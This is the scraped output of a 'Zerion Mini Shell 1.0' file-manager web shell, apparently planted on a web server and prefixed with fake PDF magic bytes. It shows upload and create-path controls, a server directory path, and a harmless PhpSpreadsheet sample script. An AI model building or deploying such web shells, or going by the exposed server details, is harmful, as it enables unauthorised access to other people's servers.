%PDF- %PDF-
Mini Shell

Mini Shell

Direktori : /var/www/html/hr/api/vendor/phpoffice/phpspreadsheet/samples/Basic/
Upload File :
Create Path :
Current File : /var/www/html/hr/api/vendor/phpoffice/phpspreadsheet/samples/Basic/27_Images_Xls.php

<?php

use PhpOffice\PhpSpreadsheet\IOFactory;

require __DIR__ . '/../Header.php';

// Read from Xls (.xls) template
$helper->log('Load Xlsx template file');
$reader = IOFactory::createReader('Xls');
$spreadsheet = $reader->load(__DIR__ . '/../templates/27template.xls');

// Save
$helper->write($spreadsheet, __FILE__);

Zerion Mini Shell 1.0